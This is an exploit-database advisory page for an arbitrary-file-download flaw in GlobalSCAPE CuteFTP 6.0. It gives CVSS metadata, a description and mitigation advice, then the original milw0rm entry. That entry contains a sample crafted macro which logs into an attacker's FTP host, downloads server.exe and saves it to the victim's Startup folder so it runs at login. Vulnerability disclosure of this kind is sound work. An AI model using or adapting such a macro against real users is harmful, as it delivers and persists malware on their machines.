header-logo
Suggest Exploit
vendor:
CuteFTP
by:
atmaca@prohack.net
5.5
CVSS
MEDIUM
Arbitrary File Download
22
CWE
Product Name: CuteFTP
Affected Version From: GlobalSCAPE CuteFTP V6.0
Affected Version To: GlobalSCAPE CuteFTP V6.0
Patch Exists: NO
Related CWE:
CPE: a:globalscape:cuteftp:6.0
Metasploit:
Other Scripts:
Platforms Tested:
2004

Arbitrary File Download in GlobalSCAPE CuteFTP V6.0

An attacker can create a crafted CuteFTP macro (*.mcr) and when it's loaded in the target computer, it can download an arbitrary file into the target user's startup folder.

Mitigation:

Update to a patched version of GlobalSCAPE CuteFTP V6.0 or later. Do not open or execute macros from untrusted sources.
Source

Exploit-DB raw data:

Application:  GlobalSCAPE CuteFTP V6.0
             http://www.globalscape.com/

Risk:         Medium

/*
e-mail: atmaca@prohack.net
web: http://www.prohack.net
*/

--The bug:

Atacker can create a crafted CuteFTP macro (*.mcr),
and when its loaded in the target computer, it can download the Arbitrary file
into the target users startup folder.

----example *.mcr macro----

Host FTP_HOST_HERE
Login Normal
User FTP_USER_HERE
Pass FTP_PASS_HERE
Connect
RemoteSelect server.exe
Download
LocalCwd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\


# milw0rm.com [2004-09-28]

Navigation

Suggest Exploit

Services By CQR